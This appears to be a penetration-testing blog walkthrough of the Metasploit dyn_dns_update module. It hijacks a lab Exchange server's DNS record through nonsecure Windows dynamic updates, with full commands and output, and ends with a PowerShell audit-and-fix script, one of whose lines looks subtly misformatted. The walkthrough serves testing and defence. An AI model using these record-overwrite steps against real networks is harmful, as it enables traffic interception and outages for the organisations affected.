“Secure” DNS updates is the default in Windows, but there is an option to allow “Nonsecure” updates. I have seen this changed when non-Windows DHCP servers are used (e.g. access points); this opens a network up to some pretty nifty attacks that a Metasploit module just hit the ground for.
![](/images/2017/nonsecure_dns_updates.png)
The module was originally written by King Sabri, with many touch-ups and the spoofing capability by busterbcook.
You can read up on the pull request in pr/#8599.
Just to drive home the point I’ll be using my Exchange server as a target:
**You will break email for the entire company if you do this on a live network. Doing so is possibly a resume generating event.**
![](/images/2017/before_dns_update.png)
If you are going to be overwriting an existing record make sure to keep a note of the real IP address of the host you are overwriting so that you can fix the record afterwards.
```shell
$ dig @192.168.80.10 sdexchange.sittingduck.info
;; ANSWER SECTION:
sdexchange.sittingduck.info. 1200 IN A 192.168.80.13
```
Here is what the module looks like:
```text
msf > use auxiliary/admin/dns/dyn_dns_update
msf auxiliary(dyn_dns_update) > show options

Module options (auxiliary/admin/dns/dyn_dns_update):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   CHOST                      no        The source address to use for queries and updates
   DOMAIN                     yes       The domain name
   HOSTNAME                   yes       The name record you want to add
   IP                         no        The IP you want to assign to the record
   RHOST                      yes       The vulnerable DNS server IP address
   TYPE      A                yes       The record type you want to add. (Accepted: A, AAAA, CNAME, TXT)
   VALUE                      no        The string to be added with TXT or CNAME record

Auxiliary action:

   Name    Description
   ----    -----------
   UPDATE  Add or update a record. (default)
```
It has 3 different actions, but you’ll mostly want UPDATE. UPDATE will automatically delete a record if it exists already and then add the record back with your specified settings.
```text
msf auxiliary(dyn_dns_update) > show actions

Auxiliary actions:

   Name    Description
   ----    -----------
   ADD     Add a new record. Fail if it already exists.
   DELETE  Delete an existing record.
   UPDATE  Add or update a record. (default)
```
Here are the settings I chose. Notice the IP address that I’m injecting isn’t on the same subnet as the domain.
```text
msf auxiliary(dyn_dns_update) > set DOMAIN sittingduck.info
DOMAIN => sittingduck.info
msf auxiliary(dyn_dns_update) > set HOSTNAME sdexchange
HOSTNAME => sdexchange
msf auxiliary(dyn_dns_update) > set IP 100.100.100.100
IP => 100.100.100.100
msf auxiliary(dyn_dns_update) > set RHOST 192.168.80.10
RHOST => 192.168.80.10
```
And the output:
```text
msf auxiliary(dyn_dns_update) > run

[+] Found existing A record for sdexchange.sittingduck.info
[*] Sending dynamic DNS delete message...
[+] The record 'sdexchange.sittingduck.info => 100.100.100.100' has been deleted!
[*] Sending dynamic DNS add message...
[+] The record 'sdexchange.sittingduck.info => 100.100.100.100' has been added!
[*] Auxiliary module execution completed
msf auxiliary(dyn_dns_update) >
```
# Game Over
This will stay until fixed or until the original host performs another dynamic DNS update of its own (every 24 hours or so).
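The fix is the zone setting from the first screenshot. The following audit script is an added example, not part of the original post or the Metasploit module; it assumes the DnsServer PowerShell module (installed with the DNS role or RSAT) and administrative rights on the server, and lists every primary zone that still accepts nonsecure dynamic updates, optionally switching AD-integrated zones back to Secure.

```powershell
# Added audit script: find Windows DNS zones that accept nonsecure dynamic updates.
# Assumes the DnsServer module and admin rights on the target server (hypothetical setup).
param(
    [string]$ComputerName = $env:COMPUTERNAME,  # DNS server to audit
    [switch]$Fix                                # change the setting instead of only reporting
)

Import-Module DnsServer -ErrorAction Stop

# Only primary zones hold records that can be updated dynamically; skip the
# auto-created reverse zones (0.in-addr.arpa, 127.in-addr.arpa, ...).
$zones = Get-DnsServerZone -ComputerName $ComputerName |
    Where-Object { $_.ZoneType -eq 'Primary' -and -not $_.IsAutoCreated }

$findings = 0
foreach ($zone in $zones) {
    # DynamicUpdate is one of: None, Secure, NonsecureAndSecure
    if ($zone.DynamicUpdate -ne 'NonsecureAndSecure') { continue }
    $findings++

    Write-Warning ("Zone {0} accepts NONSECURE dynamic updates (AD-integrated: {1})" -f
        $zone.ZoneName, $zone.IsDsIntegrated)

    if (-not $Fix) { continue }

    if ($zone.IsDsIntegrated) {
        # 'Secure' (Kerberos-authenticated TSIG/GSS updates) is only available on
        # Active Directory-integrated zones.
        Set-DnsServerZone -ComputerName $ComputerName -Name $zone.ZoneName -DynamicUpdate Secure
        Write-Host ("  -> {0} set to Secure" -f $zone.ZoneName)
    } else {
        # File-backed primary zones cannot do secure updates: the only safe value is
        # None, which also breaks whatever relied on the updates (e.g. a non-Windows
        # DHCP server registering clients), so this is reported rather than changed.
        Write-Host ("  -> {0} is not AD-integrated; set DynamicUpdate to None manually " +
                    "or convert the zone to AD-integrated first") -f $zone.ZoneName
    }
}

Write-Host ("{0} zone(s) on {1} accept nonsecure updates" -f $findings, $ComputerName)
```

Run it without `-Fix` first; anything that was depending on nonsecure updates (such as the non-Windows DHCP servers mentioned at the top) will stop registering names once the zone is switched, so plan that change rather than flip it blindly.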